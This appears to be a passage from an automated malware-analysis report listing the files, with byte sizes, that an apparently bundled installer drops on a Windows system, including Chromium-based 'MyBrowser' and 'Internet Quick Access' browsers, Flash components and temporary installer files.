    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Favicons-journal (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_yOentjedkNlWMUS (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\32.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Visited Links (284 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\index (368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\31.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\26.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History (21181 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_r6aGBN8ReJ2GMKt (286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_2 (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Top Sites-journal (12948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\000001.dbtmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2B.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data (22997 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2E.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_1 (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_0 (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Cache\data_3 (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\History-journal (4756 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\GCM Store\MANIFEST-000001 (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2A.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\28.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\Web Data-journal (1580 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\29.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\etilqs_sUlVw20TbJznEkx (532 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\First Run (0 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7db7_appcompat.txt (13516 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\User Data\Default\2F.tmp (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\avg23.exe (43108 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\UNWRK3K5\SilentInstaller_dotnet4[1].exe (162513 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf16.tmp (5641 bytes)
    %System%\Macromed\Flash\FlashInstall.log (2 bytes)
    %System%\FlashPlayerApp.exe (3851 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{1D1DE627-D4CD-4E9A-80D7-51811AD15DE3}\fpb.tmp (1779 bytes)
    %System%\Macromed\Flash\pepflashplayer32_18_0_0_209.dll (121304 bytes)
    %System%\Macromed\Flash\manifest.json (2 bytes)
    %System%\Macromed\Flash\pepper.vch (1697 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\{482CAC4F-435A-482E-9515-A215A670DE60}\fpb.tmp (7386 bytes)
    %System%\Macromed\Flash\FlashPlayerUpdateService.exe (268 bytes)
    %System%\FlashPlayerCPLApp.cpl (142 bytes)
    %System%\Macromed\Flash\FlashUtil32_18_0_0_209_pepper.exe (7386 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\VisualElementsManifest.xml (392 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\wow_helper.exe (67 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\mybrowser.exe (3869 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
    %Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
    %Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
    %Program Files%\MyBrowser\MyBrowser\Temp\source576_12840\chrome.7z (1161171 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\id.pak (231 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-CN.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\chrome.7z (1135976 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_elf.dll (124 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\splash-620x300.png (10 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-BR.pak (251 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\zh-TW.pak (216 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\secondarytile.png (637 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lv.pak (264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\uk.pak (1687 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\d3dcompiler_47.dll (22433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nb.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bn.pak (1829 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fil.pak (264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sr.pak (1670 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es.pak (265 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\mr.pak (1802 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fi.pak (244 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\chrome_installer.log (999 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_32.nexe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\kn.pak (3668 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\natives_blob.bin (1685 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\te.pak (1862 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\it.pak (254 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fr.pak (278 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ml.pak (3734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_child.dll (335724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\es-419.pak (260 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\icudtl.dat (75554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libegl.dll (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ms.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sw.pak (238 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Quick Access.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ko.pak (265 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\lt.pak (259 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-US.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ru.pak (1673 bytes)
    %Documents and Settings%\%current user%\Desktop\Internet Quick Access.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\fa.pak (1648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\da.pak (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\el.pak (1745 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_watcher.dll (1657 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Internet Quick Access\Internet Quick Access.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ta.pak (3681 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\de.pak (258 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sk.pak (268 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_200_percent.pak (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ar.pak (1629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\he.pak (297 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl_irt_x86_64.nexe (23407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\smalllogo.png (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sv.pak (237 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\metro_driver.dll (1793 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hi.pak (1809 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\45.0.2433.0.manifest (248 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\resources.pak (130562 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\vi.pak (289 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pt-PT.pak (256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Extensions\external_extensions.json (99 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome.dll (299767 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\snapshot_blob.bin (1713 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\gu.pak (1796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\cs.pak (260 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\pl.pak (255 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\bg.pak (1705 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\chrome.exe (3700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\delegate_execute.exe (3760 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\am.pak (1640 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hr.pak (246 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\et.pak (230 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libglesv2.dll (9606 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ca.pak (261 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\chrome_100_percent.pak (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe (4185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\wow_helper.exe (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\sl.pak (243 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ro.pak (264 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\nacl64.exe (15021 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\VisualElementsManifest.xml (401 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\th.pak (1788 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\hu.pak (274 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\nl.pak (249 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\tr.pak (256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\VisualElements\logo.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\libexif.dll (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\ja.pak (311 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Temp\source240_31594\Chrome-bin\45.0.2433.0\Locales\en-GB.pak (214 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\setup.exe (16808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\SETUP.EX_ (1612 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CR_5E130.tmp\CHROME.PACKED.7Z (274744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\6481.exe (14022 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\87D37.dmp (226144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj1B.tmp (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (9352 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QXGRCP0F\installer[1].exe (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq18.tmp (128293 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk14.tmp (15 bytes)
